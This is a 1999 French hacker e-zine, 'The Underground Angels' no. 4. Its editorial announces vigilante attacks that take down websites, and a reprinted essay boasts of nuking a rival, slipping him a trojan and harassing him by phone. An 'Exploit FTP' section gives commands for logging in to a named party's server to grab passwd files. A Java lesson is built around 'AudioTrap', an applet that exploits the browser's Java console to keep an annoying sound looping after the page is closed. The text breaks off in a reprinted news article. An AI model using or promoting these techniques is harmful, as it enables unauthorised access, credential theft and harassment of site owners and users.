Copy Link
Add to Bookmark
Report

The Underground Angels 4

eZine's profile picture
Published in 
The Underground Angels
 · 21 Aug 2020

  

____________ _ _ _ _ _ __________ _
/ / / / // / / / / ___ / /
/___________/_/ / // / / / / / / / /
/ / / / // / / / / /___/ / /
/ / / ___ / // / / / __ / ____ / / ___
/ / / / / / \_/ / / / / / / / / / / / /
/____/_/ /__/ \_____/_/ /__/ /__/_/ /__/_/ /__/


THE UNDERGROUND ANGELS
-------
HTTP://undergroundangel.cjb.net
HTTP://WWW.multimania.com/TUA/
#TUA et #Hack.fr sur irc.kewl.org 6667 (Le Samedi soir)
white_angel_tua@hotmail

_______________
| E-Zine Nø4 |
|Par White Angel|
|_______________|
SEPTEMBRE 1999

A LIRE DANS WORDPAD !
======================================================================
EDITORIAL
======================================================================

Et c'est repartis...Pour un 4ème numéro de The Underground Angels
Après de belles vacances comme ça, nous revoilà en pleine forme
pour vous apprendre de nouvelles techniques....

Toujours plus de monde sur notre site, toujours plus de membres et
toujours plus de lecteurs...
Mais avant tout pour les nouveaux, une présentation du groupe.
Qui sommes nous ??

TUA est une organisation underground rassemblant des personnes franco-
phones de tout pays (France, Belgique, Canada...etc).
Nous sommes principalement des hackers(débutants ou confirmés) qui
veulent remettre un peu d'ordre sur Internet en supprimant les sites
suivants:

-Sites pédophiles
-Sites Racistes
-Sites Nazis (SS, FN....)
-Sites de pays ou les droits de l'homme ne sont pas respectés.
-Sites prônant l'esclavagisme (Hommes, Femmes, Enfants...)
-Sites de sociétés utilisant des animaux pour des expériences ou pour
des fourrures.
-Des grosses entreprises dangereuses (Microsoft, France Télécom)
-Sites de sectes (Eglise de la Scientologie...)
-Autres sites empécheur de tourner en rond....

Pour nous, internet est quelque chose de précieux qu'il faut protéger.
Nous devons alors attaquer et frapper là ou ca fait mal et surtout là…
où les autorités ne peuvent pas agir.
Mais aussi, pour nous, le hack est une philosophie de vivre, un art
et surtout un moyen de faire passer nos idées...

Le Hacking, c'est aussi une philosophie qui consiste à régler des
problèmes et à relever des défis que la plupart des gens contourneraient
ou ne verraient même pas. Utiliser des moyens détournés pour accéder
à des choses que personne ne connait.
Ce n'est pas le résultat qui compte mais la méthode employée...

Voilà. en ce qui nous concerne, nous ne faisons pas ça pour l'argent
ni pour la gloire...Mais plutôt pour nous faire connaitre et prouver
au monde entier que le hacking n'est pas un délit mais plutôt un
nouveau moyen d'expression qui fait très peur à tous les gouvernements...
Et aussi pour empêcher certains sites et organisations de venir polluer
notre réseau, Internet, que je considère comme mon réseau, ton réseau,
les autres (Mr Tout_le_monde) ne sont que "tolérés" par nous tant
qu'ils ne nous nuisent pas et ne nuisent pas au réseau....


White Angel

Sinon, un conseil, apprenez, apprenez et après, rejoignez nous !!!

[Nd MadDany : et apprenez encore un peu après ça ! :o)]

========================================================================
SOMMAIRE
========================================================================
au sommaire cette fois ci:

-Devenir et Reconnaitre un Hacker (White Angel)
-Exploits FTP (Korben)
-Initiation à la programmation Java (MadDany)
-Bonus
-Liste des ports (MadDany)
-Hack de serveur Web avec votre Browser (White Angel)
-Test (MadDany)
-Rester anonyme sur le Web (White Angel)
-WinGates (MadDany)
-Xoom.com (Korben)
-Rejoignez nous !!
-Remerciements !!

========================================================================
DEVENIR UN HACKER/RECONNAITRE UN HACKER...etc
========================================================================
Texte qui résume bien la façon de penser du hacker et qui permet de faire
un tour très rapide de notre communauté Underground...
copier/coller du zine 2020hack par Clad Strife (la flemme me perdra...)
(G viré le passage sur Back Orifice...)
[Nd MadDany : et moi j'ai corrigé les fôtes d'ortograf]
[Nd WA : Merci gars car ceux de 20/20hack ils sont 0/20 en orthographe]
__________________________________________________________________________
Le hacking est un phénomène qui touche de plus en plus de gens partout dans
le monde! De plus en plus de gens sont intéressés par cette mentalité qu'est
celle du hacking... Nombre de personnes rêveraient de devenir hacker.
Et nombre de personnes se font une mauvaise image du hacker en général.

Car en effet il faut différencier les types de pirates: Il y a:

· Les crashers: les crashers sont de dangeraux pirates qui détruisent tout
pour le plaisir... cette mentalité est peut-être l'une des moins répandues,
car il faut savoir que les crashers sont très souvent haïs par le milieu du
piratage. A éviter donc.
· Les crackers: ils sont là pour cracker les programmes (ex: enlever le
passworrd d'un file en le désassemblant pour le diffuser ensuite sur internet).
Les crackers ne sont pas fondamentalement dangereux. les très bons crackers
sont de véritables génies (il faut le dire) de la programmation. sans eux
le réseau internet ne serait pas ce qu'il est maintenant.
· Les lamers: en général ce sont les débutants dans le milieu du piratage...
Ce sont souvent les "bizus" des élites! Si vous débutez dans le milieu
du H/P/C/V (hacking, cracking, phreaking etc...)essayez d'acquérir
un certain niveau de connaissance seul... en général les élites du
dessus n'hésiteront pas à vous filer un ou deux trojans entre quelques
programmes. sauf si c'est quelqu'un que vous connaissez bien ou qui est
votre ami.
· Les phreakers: le phreaker est un pirate du réseau téléphonique en général...
Mais il peut aussi pirater sa borne EDF, graver des cd crackés etc...
En général les phreakers se mêlent rarement au milieu du hacking. Tout ce
qui concerne le piratage de la ligne téléphonique du voisin pour se faire des
minutes gratos ça les concerne!
· Les hackers: ce sont les pirates du net... Les meilleurs du hacking sont
quasiment inconnus. Jusqu'au jour ou ils pratent le Pentagone et qu'ils se
font choper! La moyenne d'âge des hackers tourne entre 15 et 25 ans. Ils
piratent n'importe quoi. Par simple défi. Par pur plaisir. Les hackers
s'attaquent rarement aux autres internautes! Mais méfiez vous! Les hackers
sont un peu crashers dans leur côté obscur. Donc c'est surtout des hackers
dont nous parlerons. Il faut savoir que les médias donnent une mauvaise image
du hacking, en faisant des articles diffamateurs ou en médiatisant le
mauvais côté du hacking. Les médias profitent de l'ignorance que les
gens ont sur le piratage pour détruire la VERITABLE image du hacker!
Sans les hackers allez savoir si votre réseau internet existerait! Internet
était au départ un réseau militaire. Mais les universitaires et les scientifiques
en ont fait le réseau internet. Et pas les médias (qui font jamais bien leur
boulot d'ailleurs :-))!
Des universitaires! Donc tout ça pour vous dire que ce que les médias pourront
vous raconter sur le piratage informatique ne sera pas toujours juste. Mais
si on a tendance à penser qu'un hacker est un dangereux criminel,
celui-ci aura tendance à se criminaliser; c'est psychologique. Mais les
hackers sont loin d'êtres tous dangereux...

[Nd MadDany : nous sommes loin d'être ***tous*** dangereux... harf harf harf]

Certains hackent même pour prouver qu'aucun système de sécurité ou sytèmes
d'exploitation n'est infaillible.
Ce qui nous permet de démontrer que Windows est une vraie "passoire"
(pardonnez l'expression).
Ainsi on pourrait s'imaginer que certains trous de sécurité sont volontaires.
D'ailleurs Microsoft a fait en sorte
que Money99 (qui n'est pas encore officiellement sorti) ne marche que si
Microsoft Intenet Explorer 4 est installé!
Les accusations qui se font au sujet de Bill Gates, comme quoi son but serait
de détenir tout le marché de l'informatique, peuvent être considérées comme
vraies! Pas à 100%. Mais il faut avouer que Microsoft est ce qu'est Coca-Cola
par rapport à la grenadine. Les statistiques démontrent que Microsoft détient
environ + de 90% du marché informatique, mais... pouvons nous incriminer Bill Gates?
car si vous êtes pas content y'a toujours Linux ou Unix! Et vous devez aussi
avoir Netscape Navigator sur votre bécane, non? Bref pour clore cette introduction
je tiens quand même à vous dire que, bien que les médias arrangent les faits à
leur manière,
ceux-ci ne sont jamais forcément erronés.

----- 2°/ Un hacker... c'est quoi au juste? -----

Ben... comment vous expliquer ça. Un hacker (je vais faire quand même un petit
récapitulatif de ce qui a été vu plus haut), c'est un pirate qui essaie de découvrir les failles de chaque système, c'est quelqu'un qui crée des programmes de piratage etc...,
par simple défi. Pas pour le fric (pas toujours: la tune tombe pas des arbres).
Bref... Les hackers forment aussi une "communauté" ou l'on se doit d'être solidaire...
Les hackers se tapent rarement dessus. [Nd MadDany : il y en a qui devraient lire ce passage une centaine de fois avant de se coucher, tous les soirs pendant deux ans...] Mais le hacking c'est aussi une mentalité.
Une volonté. On ne se lance pas dans le hacking pour déconner. Non...
En général on va jusqu'au bout. Rares sont ceux qui ont abandonné en cours de route.
Il y a tellement de choses à découvrir dans le monde du piratage que cela revient à en découvrir un nouveau monde: l'autre côté de l'utilisation d'un ordinateur.
Pas forcément le côté obscur de l'utilisation d'un ordinateur mais surtout les
possibilités que ce côté peut nous offrir (si vous voyez ce que je veux dire!).
Il faut savoir qu'il y a différents aspects dans le hacking! On peut facilement
se les imaginer: études des différents systèmes de sécurité, création de programmes,
piratage du pc d'un pauvre internaute etc... en général les très bons
hackers sont appelés: Elites et sont quasiment inconnus! Si jamais vous en rencontrez un ou que
vous avez judicieusement su en reconnaitre un, eh ben gardez ça pour vous.
Rien de pire que de s'attirer des emmerdes, de toute la communauté hacker,
qu'en dénoncant " un de l'élite". Mais un hacker c'est aussi une personne
comme vous et moi! On ne doit pas s'imaginer que parce qu'une personne pirate elle se différencie forcément de la société dans laquelle vous vivez. Elle est contribuable,
regarde la télé (Eh oui! Ca lui arrive!), dort dans un lit, etc... mais un hacker
c'est aussi une personne aimable, courtoise et pas forcément belliqueuse!
Loin de toutes les idées reçues ce serait plutôt le contraire:
tendance pacifique. Mais bon... Y'a des exceptions hein! Faudrait pas s'faire
des illusions! (on va finir par croire
que je contredis ce que j'écris!)

----- 3°/ Savoir reconnaitre un hacker et devenir hacker -----

Bon... Il faut savoir que ce sera pour vous un honneur si vous rencontrez dans
votre vie une personne de l'élite(c.f. para 2°/). Donc il sont très très difficilement reconnaissable, de plus c'est pas lui qui vous le dira! Comptez pas là-dessus!
Il vous faudra vous contenter de reconnaitre les hackers (je dirais pas les
moyens), mais ceux qui ont dépassé ce stade de débutant. Ceux qui savent des
trucs, ceux qui peuvent vous apprendre des trucs mais pas des débutants
(bien qu'il ne sache pas tout). Donc je vais vous expliquer comment reconnaitre
un hacker... Mais d'abord un petit point que je voudrais éclaircir... J'avais
lu un e-mag qui disait: "pour être un hacker il faut mettre des 3 à la place
des E, des 5 à la place des S, des 0 à la place des 0, de mettre des Z à la fin
de chaque mot au pluriel etc..."
ce qui pouvait donnait des phrases totalement
absurdes. Cet E-mag disait aussi qu'un hacker est fier d'avoir une orthographe
complètement nulle et il le montre. Inutile de vous dire que ces informations m'ont
donné envie de vomir. rien de pire que de prendre les gens pour des cons.

[Nd MadDany : t'es gentil Clad mais t'aurais du lire ton texte jusqu'au bout, c'était une satyre, une parodie. Pour rigoler quoi. Dans l'esprit du TrOu dU cul'Z hiD3oUt.]
[Nd WA: D'ailleurs, l'élite à un language soutenu dans le genre 'upper class']

Si une personne arrive sur le chat avec une orthographe pas possible et une écriture de dément,
inutile de vous poser trop de questions:
CETTE PERSONNE N'EST PAS HACKER ET ELLE LE MONTRE. Rien de moins sérieux qu'une
personne faisant exprès d'avoir une orthographe éxecrable et une écriture pas
possible.
Car un hacker (en général) est quelqu'un de sérieux et essaie d'avoir au
maximum la meilleure orthographe et écriture possible! [Nd MadDany : ;^)] Mais on peut aussi se
dire que l'habit ne fait pas le moine. Que les hackers n'ont pas forcément une bonne orthographe. c'est vrai! Il ne faut pas préjuger! mais sachez faire la différence.
Mais inutile de vous dire que si un mec arrive sur un chat en gueulant à qui
veut l'entendre: "Je suis hacker! Je suis le meilleur des pirates" et autres
insanités, cette personne n'a même pas du se poser la question une fois dans sa
vie, ce qu'était un hacker... encore un blaireau... Inutile de demander son chemin
à cette espèce là! Il y a aussi le mec qui répond n'importe quoi ou qui se ramène
avec des nicks trop évidents (ex: hack-man), qui lui doit en savoir un peu plus
que l'autre blaireau mais bon... Un peu trop orgueuilleux! Parce que je vais vous
raconter une anecdote: j'connais un mec qui s'est ramené sur le chat en beuglant:
"Je suis un pirate! Je suis un hacker!". Obligatoirement je lui ai demandé de me
le prouver.
Je n'attendais aucune réponse bien sérieuse de sa part. D'ailleurs je n'en ai
pas eu. Ce mec j'ai réussi à trouver son UIN, son IP et tout le bla-bla... alors au
début je lui ai parlé piratage (sur icq), histoire de voir s'il en connaissait un bout...
J'lui ai envoyé des files pour qu'il puisse se démerder (parce que je me suis
tout de même aperçu qu'il ne savait rien! MAIS RIEN DU TOUT! Mais bon... comme il était intéressé...), et après il m'a dit (je vais
reproduire le dialogue):
<M(je garde le nom secret, par respect)> comment on fait pour lire ton file???
<Clad Strife> ben... tu le dézipes et tu lis le txt!
<M> c'est quoi un txt?
<Clad Strife> Tu sais même pas ça? ohlàlà! c'est un document texte!
<M> Ahh! Et pour le dézipper? Coment k'on fait?
<Clad Strife> tu cliques 2 fois rapidement sur le logo!
<M> Ah! *user is away*
<Clad Strife> Ca marche?
<M> *user is away*
<Clad Strife> hohé!!! (là je fais ctrl+G ( ça fait du bruit chez l'autre)! On
aurait dit que le mec se serait endormi sur son clavier; le *user is away*
signifiant qu'il est plus sur le chat)
<M> Ouais et ben ca marche po! (le con savait pas dézipper)
<Clad Strife> Putain! t'es naze comme mec!
<M> ohoh! calme toi! Je te signale que j'ai des trucs qui font mal très mal!!!
(il venait de télécharger un nuker et Nonuker! Alors il essaie de me nuker!
Le fire-wall détecte! Je chope son IP! Je bloque l'attaque, puis je sors un autre
nuker, je le nuke sur un autre port que le 139, mais son anti-nuker détecte. AÏE!)
<Clad Strife> t'es vraiment nul! Connard! t'as un nuker et tu te crois le
boss des hackers! l'élite! tu me fais pitié! pff!
<M> Tais-toi sinon je te fais très mal! J'ai des trucs qui bousillent!
(bien sur il a que dalle!) <Clad Strife> C'est vrai? Oh non! Pitié!
Pas ça! hahahahahahahahaha! Ben vas-y essaie!
J'ai envie de rire! Tu me fais hurler de rire t'es un bouffon!
<M> Tais-toi sinon j'appele mon copain! c'est lui qui m'a filé les programes!!!*
<Clad Strife> Encore un blaireau...
<M> oh et puis merde j'me casse! t'es trop con! Enfoiré
*User has left the chat*
Bon eh ben lui il m'a grave fait chier! Sauf que j'appris par la suite que
son copain c'était J (secret aussi), un de mes potes qui entre deux nukers
lui avait filé un trojan! Alors... ce mec si vous le rencontrez et que
vous reconnaissez sa manière de faire, n'hésitez pas à lui "foutre un pain
sur la gueule"
! J'avais manqué de tact ce jour là mais bon... De plus
j'avais son tel. Il a passé un sale quart d'heure! Il a plus recommencé.
Mais si je vous raconte cette anecdote c'est pas pour rien. C'est pour
vous démontrer que des gros cons
(pardonnez l'injure mais ça défoule) orgueuilleux y'en a
partout! Revenons à nos moutons... J'ai souvent vu marqué qu'un vrai
hacker se devait d'avoir Linux (dans d'autres E-mags Unix), s'il voulait
devenir un VRAI hacker...
Mais pour en revenir à notre premier E-mag (c.f. début chapitre),
celui-ci disait: "vous devez avoir Linux sinon c'est inutile d'essayer
d'être hacker. Là j'ai vomi :-). Comment peut-on dire des choses aussi
absurdes! On peut très bien être hacker et ne pas être sous Linux ou Unix!
Pourquoi pas sous Windows95 ou Windows98! Moi je suis sous Windows95 et j'en
suis fier! Bien que Linux n'est absolement pas négligeable pour hacker! [Nd MadDany : Linux sucks !!!] Mais
de là à dire que c'est l'outil qu'on se DOIT d'avoir, là non!!! Rien de plus
faux! je le dis, je le répète! Et je continuerais de le répéter! J'avais aussi
remarqué que les hackers (les bons et les débutants), mettaient souvent des
petits signes distinctifs, dans certains mots, tel que: Micro$oft ou transformait
des mots pour en faire des: zindaube, winfuke, microdobe,
etc... Nous sommes loin des critères débiles du E en 3 et du O en 0! Non...
Là ça a surtout un caractère humoristique qui tient à démontrer que l'on se moque bien de windows et de ses trous de sécurité! donc pour se démarquer de tous ces débiles
qui prenne ça à la légère! Je vais aborder un autre type de personnes qui
existent: les lamers (c.f.: chapitre1). Les lamers sont loin d'être des gros cons... Au contraire.
ce sont en général des personnes qui débutent dans le milieu! Il n'est
pas exclu de les aider! Il sauront vous le rendre tôt ou tard! Les lamers
disent qu'ils aimeraient être hacker et demanderont au premier venu de leur
enseigner pour peu que celui-ci s'y connaisse un peu. c'est pourquoi, vous
recevrez souvent des messages de lamers qui vous demanderont de leur apprendre
le hacking. Evitez de les envoyer balader! Ils vous ont rien fait ;-).
Vous aussi vous avez été lamers au tout début de votre période! Vous aussi vous
avez demandé à des gens de vous apprendre! Alors??? Bref... Essayez de vous
démarquer des blaireaux sans pour autant ne pas vous amuser à glisser un petit
Zindaube dans la conversation :-)!!! (Non. en fait je dis ça car j'aimais pas trop
qu'on m'envoie promener au début de mon apprentissage!)

__________________________________________________________________________

Voilà, cela résume bien le hacking en général...Ca, c'est pour les Newbies.
Un petit repère....

WA
========================================================================
EXPLOIT FTP
========================================================================
Assez vieux mais bon, c juste pour le fun...
A essayer sur certains serveurs....

lancer command.com
taper:
>ftp -n

le prog se lance, vs avez alors:
ftp>
Là, vous tapez la commande open suivie du nom du site ou de son IP
ftp>open www.front-nat.fr
Un message défilera...Bienvenue...etc

une fois connecté, tapez:
ftp>QUOTE user ftp
User name accepted, enter a password

ftp>Quote cwd ~root
Please login with user and pass before

ftp>QUOTE pass ftp
et voilà, normalement, vs êtes connecté à la machine...
tapez ? pour avoir la liste des commandes...

[Nd MadDany : en faisant ça on se logge en tant que guest, avec toutes les restrictions d'usage. C'est bien pour choper les fichiers passwd par exemple mais n'oubliez pas que vous êtes tout de même loggé, toutes les commandes que vous tapez, votre IP et votre hôte, tout ça est enregistré. Alors imaginez pas que vous êtes root rien qu'en tapant ça. De plus si vous faites juste get etc/passwd et que vous vous déconnectez en suivant c'est pas très discret vos intentions.]

Korben
========================================================================
The ultimate guide to eating rotten worms, by MadDany
========================================================================

Bienvenue dans ma collection des titres-qui-n'ont-rien-à-voir-avec-le-reste-de-l'article.
Donc, comme son titre ne l'indique pas, cet article est une introduction au Java.

Le Java est un langage de programmation, qui est encore peu connu. Il a été créé pour apporter avec les mêmes objectifs de l'HTML, mais pour faire cette fois un vrai langage de programmation. Pour les incultes, l'HTML a été développé pour que des documents puissent être visibles sur toute la planète, et fonctionnent de la même manière. Pari réussi, vous pouvez tous visualisez des pages web, que vous soyez sous Zin, Mac, Linux... Donc le Java est un langage de programmation qui est portable, c'est à dire qui permet de créer des programmes fonctionnant indiféremment de l'environnement de travail. Pour cela, la solution était simple, au lieu de faire des programmes exécutables "
classiques", on va faire des programmes s'utilisant depuis une interface, et c'est cette interface qui va changer d'un OS à l'autre. Donc vous pouvez écrire vos programmes en Java en sachant que sans aucune modification il pourra tourner sur l'ordi de votre pote qui a un Mac (bouuuhhh les macs !!!).

Maintenant entrons dans les spécifications de Java : il existe deux types de programmes : les applets et les applications. Les applets sont spécialement conçus pour être intégrés à des pages web, et pouvoir ainsi améliorer le niveau technique de ces dernières, l'interactivité, la sécurité, ou l'ergonomie... les applications sont de vrais programmes, ils s'utilisent non plus depuis votre browser mais depuis une interface Java spécifique. Comme vous n'en possédez sûrement pas, vous pouvez télécharger le JRE à cette adresse : http://www.java.sun.com/products/

Le JRE (Java Runtime Environment) vous permettra d'utiliser les applications Java (qui sont en .class), mais aussi les applets grâce à l'appletviewer. L'avantage de visualiser les applets à partir de cet outil c'est que l'appletviewer est bien plus performant que la console Java de votre browser, et qu'en plus il est compatible avec les fonctionnalités de Java 2, alors que les consoles Java des browsers en sont toujours à Java 1.0.2 ou 1.1 pour la plupart.

Les applications et les applets Java sont des fichiers portant l'extensions .class, comme ils ne sont pas exécutables vous ne pourrez rien faire en cliquant dessus. Pour les utiliser placez les dans le répertoire bin du JRE, en principe celui où vous trouverez le programme java.exe. Pour les visualiser, placez vous dans ce répertoire en passant par le DOS (je sais pas comment on fait pour les autres OS), puis tapez java nomdufichier, en supposant que votre programme s'appelle nomdufichier.class. Si ce programme est un applet, tapez appletviewer programme. Vous connaissez les principes de base de Java, et comment utiliser des programmes écrits avec ce langage fabuleux !


Maintenant il se peut que vous tombiez sur des fichiers sources de programmes écrits en Java, je vais donc rapidement décoder certains éléments.

Voici un fichier source d'applet que j'ai réalisé, mes commentaires sont soit entre /* et */, soit après // :

-------------------BEGIN SOURCE CODE--------------------
/* cet applet a été créé par MadDany. Lorsqu'il est exécuté depuis un browser, il joue un petit son énervant, et il continue de le jouer même si on quitte la page contenant l'applet (étant donné que c'est la console java du browser qui se charge de jouer le son, ce genre d'évènements est alors indépendant de la page en cours). Les seuls moyens d'arrêter ce son sont : 1)fermer le browser ou 2)couper le son. Cet applet marchera sur n'importe quel browser compatible Java 1.0.2 ou 1.1, comme Netscape 4.0 ou Internet Explorer 4.0 (ou plus). Il est possible de changer le texte qui va apparaitre dans la fenêtre d'applet en insérant un tag <param name="
texte" value="blablabla"> entre les tags <applet> </applet>, où blablabla est le texte que vous voulez voir apparaitre.

Si quelqu'un prend la peine d'améliorer cet applet, qu'il m'en envoie une copie à maddany@multimania.com. Merci
If anybody upgrades this applet, please send me a copy at maddany@multimania.com. Thx

MadDany 1999 */


/* importation des classes nécessaires à l'exécution du programme ces classes sont des programmes déjà écrits, dont je vais importer les caractéristiques dans cet applet. J'explique ce principe plus loin. */
import java.awt.Graphics;
import java.applet.AudioClip;
import java.awt.Color;
import java.awt.Font;

public class AudioTrap extends java.applet.Applet implements Runnable {

// déclaration des variables
AudioClip beep;
Thread runner;
Font police1 = new Font("
Impact", Font.BOLD, 100);
String texte;

// début du Thread jouant le son
public void start() {
if (runner == null) {
runner = new Thread(this);
runner.start();
}
}

// arrêt du Thread, sans pour autant arrêter le son !!!
public void stop() {
if (runner != null) {
runner = null;
}
}

// chargement des différents paramètres, comme le son et le texte à partir de la page web
public void init() {
texte = getParameter("
texte");
if (texte == null)
texte = "
LaMaH FuCk !!!";
beep = getAudioClip(getCodeBase(), "
beep.au");
}

// le son est joué en boucle
public void run() {
if (beep != null)
beep.loop();
Thread thisThread = Thread.currentThread();
}

// définition des paramètres graphiques
public void paint(Graphics screen) {
setBackground(Color.black);
screen.setFont(police1);
screen.setColor(Color.red);
screen.drawString(texte, 0, 300);
}
}
-------------------END SOURCE CODE--------------------

Avec les commentaires c'est pas bien sorcier non ? Je vais décortiquer plus précisément. Java est un langage orienté objet, c'est à dire que vous allez définir une classe (les classes sont comme des minis programmes, mais dont certains ne font rien, les classes peuvent très bien seulement définir un comportement) avec un comportement assez abstrait, regroupant surtout des variables et des méthodes générales. Puis vous allez créer des sous classes de cette classe qui vont hériter de son comportement, ses variables, ses méthodes... et ainsi de suite, à chaque fois que vous créez une sous classe, vous affinez un peu plus le fonctionnement, jusqu'au moment ou vous créez des instances de ces sous classes, comme des bébés. Ces bébés vont hériter du fonctionnement de leurs parents, les classes sont là pour dire aux instances (ou objets) comment se comporter. Voici le principe de la programmation orientée objet. Donc au tout début du programme, avec la commande "
import", je vais faire appel à des packages de classes qui vont apprendre à mon programme à faire des choses en lui faisant hériter de leur fonctionnement. En l'occurence je vais pouvoir dessiner des choses, jouer des sons, utiliser des couleurs et des polices d'écriture spéciales.

Ensuite je définis la classe, ce qui va permettre à mon applet d'être utilisée correctement. Je mets dedans le fragment "
extends java.applet.Applet" pour dire que ce programme est un applet, et donc qu'il en reprend toutes les caractéristiques. En faisant cela, je crée une sous classe de la classe Applet. Je mets aussi "implements Runnable", qui ressembvle beaucoup au fragment précédent. La formulation est différente parce que je reprend le comportement d'une interface, en l'occurence Runnable. Il existe beaucoup de similarités entre ces deux opérations, après cela devient très technique.

Ensuite je déclare mes variables. Comme leur nom l'indique, les variables sont un type d'objet (que je vais pouvoir utiliser dans tout le programme car je les ai déclarées au début) dont la valeur poura changer selon mes besoins. Les variables peuvent être de type numérique (un entier, un chiffre à virgule flottante...), du texte que l'on fera varier, et bien d'autres... le fonctionnement d'un déclarement de variable est simple, il suffit de mettre le type de variable puis le nom de la variable que j'ai choisi.Par exemple : "
String texte" crée une variable de type chaîne (du texte) que j'ai appelé texte. A tout moment je pourrais affecter une valeur à cette variable en mettant simplement "texte = "ceci est un magnifique texte"".

Vous remarquez qu'à la fin de chaque ligne se trouve un "
;", c'est pour indiquer plus clairement ce que l'on fait au compilateur. Certaines lignes ne comportent pas de ";" mais des accolades. Le texte se trouvant entre ces accolades est appelé bloc. Dans ma déclaration de classe (public class AudioTrap...), j'ai mis une "{" pour indiquer le début des instructions du programme, la dernière ligne sera une accolade fermante "}" qui va indiquer la fin de cet état. Et ainsi de suite pour chaque portion du programme.

Ensuite je dis au Thread de commencer son travail. Les Threads sont utilisés dans des applets pour dire au programme ce qu'il doit faire quand il a plusieurs actions à effectuer, il permet de respecter une marche pré-définie. En l'occurence j'aurais pu me passer de Thread vu que l'applet ne fait que jouer un son. Vous remarquez une ligne ressemblant à la déclaration de classe : "
public void start() {...}". Ceci est une déclaration de méthode, c'est à dire une portion de programme qui fait ce qu'on lui demande quand la méthode est appelée. Ici je redéfinis la méthode start() contenue dans la classe Applet, pour dire à mon applet ce qu'elle doit faire lorsqu'elle commence. Toutes les autres méthodes doivent être normalement redéfinies dans un applet pour en spécifier le comportement, comme stop(), init() ou paint(). paint() n'est pas obligatoire, c'est uniquement lorsqu'on veut dessiner quelque chose dans la fenêtre d'applet (en l'occurence on veut dessiner du texte). La méthode run() est différente, elle ne nous vient pas de la classe Applet mais de l'interface Runnable qui régit les Threads.

Ensuite dans chaque redéfinition de méthode j'utilise le plus souvent des conditionnels. Ces conditionnels sont faciles à reconnaître, ils sont sous la forme :

if (condition à remplir)
ce qu'on fait si la condition est remplie;
else
ce qu'on fait si la condition n'est pas remplie;

Souvent on n'a pas besoin d'utiliser le mot-clé "
else" car les conditions se remplissent d'elles même ou alors on a pas besoin de définir un comportement si la condition n'est pas remplie, puisque souvent il s'agit de ne rien faire. Par exemple examinons le conditionnel suivant :

if (beep != null)
beep.loop();

Ceci signifie que si notre variable beep (le son qui doit être joué) n'est pas paramétrée sur null, le son va être joué en boucle. En clair le son va être automatiquement joué en boucle puisqu'à aucun moment on ne le paramètre sur null. En principe on devrait mettre "
beep = null;" dans la méthode stop(), qui est chargée de stopper le Thread une ligne qui paramètre beep sur null, et ainsi l'applet se termine normalement lorsque vous quittez la page web. Voici la méthode telle qu'elle devrait apparaître :

public void stop() {
if (runner != null) {
runner = null;
beep = null;
}
}

La méthode stop() est appelée par définition lorsque vous quittez la page contenant l'applet, le conditionnel dit ici que lorsque la page est quittée, si le Thread tourne encore il doit être arrêté, ainsi que le son. Dans la version de mon applet le son ne s'arrête pas, je profite ici du fait qu'il est joué non pas par le navigateur lui même (qui gère uniquement la page en cours) mais par la console java de ce dernier, qui fait uniquement tourner les applets sans s'occuper de la page qui les contient. C'est d'un défaut entre l'interaction de ces deux programmes que l'on profite en fait :o).

Avec tout ce que vous venez d'apprendre vous ne saurez évidemment pas programmer en Java, mais vous pourrez mieux comprendre ce que font les programmes dont vous verrez les fichiers source. Et puis ça épate toujours les copains ;^)

J'espère avoir été clair, et peut être vous avoir donné envie d'apprendre vraiment la programmation Java. Il suffit de vous acheter un bouquin sur le sujet (j'ai "
Le Programmeur Java 2" aux éditions Campus Press, c'est pas mal, même si il y a des passages qu'ils résument un peu trop). Si vous voulez pouvoir compiler vos fichiers sources, il vous faut un autre outil que le JRE, le JDK ou le SDK par exemple. Vous pouvez trouver tous ces produits sur http://www.java.sun.com/, moi j'utilise le JDK (Java Developper Kit). Pour compiler des fichiers sources en Java, il suffit de les enregistrer dans un fichier .java respectant le nom de la classe. Je m'explique, dans la définition de classe de mon applet j'ai mis "public class AudioTrap", sauvegardez donc ce fichier dans un nouveau fichier texte, et enregistrez le sous le nom "AudioTrap.java", AVEC LES GUILLEMETS. Ainsi votre traitement de texte ne mettra pas l'extension .txt, et vous aurez un magnifique fichier source .java prêt à être compilé. Ensuite mettez ce fichier dans le répertoire bin du JDK (si vous avez pris le JDK), celui contenant normalement le programme javac.exe, et sous DOS tapez javac nomdufichier.java. Vous obtiendrez alors un nouveau fichier nomdufichier.class prêt à être utilisé.

Note : comparez ces deux expressions :
javac nomdufichier.java
java nomdufichier
Vous remarquez qu'on ne marque pas l'extension avec le programme java, ça n'a l'air de rien mais j'ai mis un moment pour me rendre compte que je n'arrivais à utiliser aucun programme parce que je marquais java nomdufichier.class
Alors refaites pas mon erreur...

Si vous voulez des conseils en Java, n'hésitez pas à m'écrire maddany@multimania.com .oO(si vous êtes une fille avec des gros seins et que vous me trouvez génial vous pouvez me laisser votre numéro de téléphone pour des cours particuliers)

[Nd WA: Tiens là, Mad ne met pas de commentaires...haha p'tet parce que
c'est son article..arf !]

========================================================================
BONUS
========================================================================
Pour ceux qui comprennent l'anglais:

---------------------------------------------------------
Computer `crackers' set sights on .gov for chaos
by Mark Mueller
Sunday, August 1, 1999
It was the kind of threat for which computer hackers are famous, a declaration of war dripping with the risk-free bravado so common on the anonymous Internet.
The warning, which appeared on a hacked Web page of the U.S. Interior Department in late May, promised unrelenting attacks against government computers to avenge an FBI roundup of hackers associated with the group Global Hell. Just weeks earlier, Global Hell had claimed responsibility for an attack on the White House's main Web page.
``Now, it's our turn to hit them where it hurts by going after every computer on the Net with a .gov,'' the message read. ``We'll keep hitting them until they get down on their knees and beg.'' That the threat was made - risking the pique of the FBI - isn't as surprising as the follow-through. In recent months, hackers, or crackers, as bad-guy hackers are known, have indeed blazed through a wide swath of government and university computers, defacing some Web sites and shutting down others.
Among the high-profile targets: the U.S. Senate (twice), the Army, the Navy and the Departments of Agriculture, Labor and the Interior. Computer systems also were hit at Georgetown University, the University of Colorado, the University of Michigan and Harvard University.
The most brazen of the attacks targeted the lion's den itself: the FBI Web page, which was out of service for nearly a week as programmers beefed up security on the site.
Jim Settle, former chief of the FBI's computer crimes squad and now an Internet security consultant, calls the FBI strike ``an out-and-out declaration of electronic warfare.''
For some, it's a war that can't afford to be lost. The feeble network that once was the domain of a few scientists is now a robust and far-reaching behemoth that caters to hundreds of millions of people, some of whom pay their taxes, buy goods and send intensely personal information through their computers.
In the wrong hands, such information could prove embarrassing or costly. Seen in its most sinister light, computer intrusion is a threat to national security.
But the self-proclaimed ``warriors'' who carried out the recent attacks against government Web sites hardly sound like cyberspace shock troops.
